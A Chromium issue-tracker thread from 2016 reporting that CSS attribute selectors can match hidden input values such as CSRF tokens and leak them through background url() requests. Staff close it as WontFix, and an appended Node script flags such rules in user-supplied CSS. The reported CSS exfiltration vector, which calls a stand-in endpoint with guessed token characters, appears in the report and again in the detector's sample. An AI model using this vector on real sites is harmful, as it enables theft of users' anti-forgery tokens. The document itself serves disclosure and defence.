
Issue 651163

Starred by 2 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Sep 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug




Hidden html element attribute value is accessible via CSS

Reported by begam.as...@gmail.com, Sep 28 2016

Issue description

UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Steps to reproduce the problem:
CSS3 attribute selectors can get information about the hidden element's attribute value.
Vector:

input[name=csrf][value^=t][value$=n]{
 background-color: yellow;
 background: url("http://localhost:8080/test/640.jsp?firstAndlastchar=tn");
}

<input  type="hidden" width="500px" value="token" name="csrf">

1. Browsers (such as Firefox) will not allow selecting the hidden attribute value

2. A web application which allows CSS as user input can bruteforce the vector to get the sensitive information

What is the expected behavior?

What went wrong?
Access to the hidden attribute from CSS has to be restricted

Did this work before? N/A 

Chrome version: Version 53.0.2785.101 (64-bit)  Channel: n/a
OS Version: 14.04
Flash Version: Shockwave Flash 11.2 r202
Components: Blink>CSS
I'm not aware of anything that considers "hidden" inputs a security mechanism, but the CSS team should probably triage and consider whether to track as a functionality bug.

Comment 2 by kenrb@chromium.org, Sep 28 2016

Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
I'm removing this from the security queue.

Values in <input type="hidden"> fields are not really a secret to the user, since they can be observed in devtools or even by monitoring the network traffic. The fact that they are hidden mostly reflects that the web application won't work properly if the user modifies them.

Sometimes they can be of significance to attackers who control other websites, such as is the case with CSRF tokens, but same origin policy protects it (i.e. attacker websites should not be able to affect the CSS of the target site).

As elawrence suggests, this might warrant investigation on the basis of it diverging from Firefox's behavior.
Status: Untriaged (was: Unconfirmed)
I looked at this further, and IE behaves as Chrome does.

Firefox does match the CSS value selector, as you can verify in their developer tools. The reason you don't see the network request is very likely that they've undertaken an optimization whereby they don't bother fetching the background image for a hidden input as the image is not rendered to the user.

So I believe this is working as intended.
Labels: -OS-Linux Hotlist-Interop OS-All
Status: WontFix (was: Untriaged)
This seems like a minor interop issue, probably very low risk of actually causing interop problems.
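
An added example, not part of the original issue thread or of Chromium's code: a server-side check in JavaScript (Node) for applications that accept user-supplied CSS, flagging rules that pair an attribute selector on `value` with a `url()` fetch, as in the reported vector. The function name, the `SENSITIVE_ATTRS` set and the sample stylesheet are assumptions made for illustration, and the regex scan is a heuristic, not a full CSS parser.

```javascript
// Added example (not from the issue thread): heuristic scan of user-supplied CSS.
// Names, SENSITIVE_ATTRS and SAMPLE_CSS are assumptions made for illustration.
const SENSITIVE_ATTRS = new Set(["value"]);
// [attr op value] with op one of = ~= |= ^= $= *= and an optional i/s flag
const ATTR_SELECTOR =
  /\[\s*([\w-]+)\s*([~|^$*]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/gi;
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;
const RULE = /([^{}]+)\{([^{}]*)\}/g; // innermost "selector { body }" pairs

function findAttributeLeakRules(cssText) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const findings = [];
  for (const [, rawSelector, body] of css.matchAll(RULE)) {
    const selector = rawSelector.trim();
    const probes = [...selector.matchAll(ATTR_SELECTOR)]
      .map((m) => ({
        attribute: m[1].toLowerCase(),
        operator: m[2],
        value: m[3].replace(/^["']|["']$/g, ""),
      }))
      .filter((p) => SENSITIVE_ATTRS.has(p.attribute));
    // CSS escapes (e.g. "\76 alue") hide attribute names from the regex,
    // so an escaped attribute selector is reported rather than trusted.
    const escaped = selector.includes("[") && selector.includes("\\");
    const urls = [...body.matchAll(URL_FN)].map((m) => m[1] ?? m[2] ?? m[3]);
    if ((probes.length > 0 || escaped) && urls.length > 0) {
      findings.push({ selector, probes, urls, escaped });
    }
  }
  return findings;
}

// Constructed sample: the first rule is the vector from the issue description.
const SAMPLE_CSS = `
input[name=csrf][value^=t][value$=n]{
 background-color: yellow;
 background: url("http://localhost:8080/test/640.jsp?firstAndlastchar=tn");
}
.avatar { background: url("/img/a.png"); }
input[type=text] { color: red; }
@media screen { input[value*=ok] { background: url(/img/x.png); } }
`;

for (const f of findAttributeLeakRules(SAMPLE_CSS)) {
  console.log(`${f.selector} -> ${f.urls.join(", ")}`);
}
```

A clean result from a heuristic like this is not proof that a stylesheet is safe; rejecting attribute selectors and `url()` outright in user CSS is the stricter policy.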
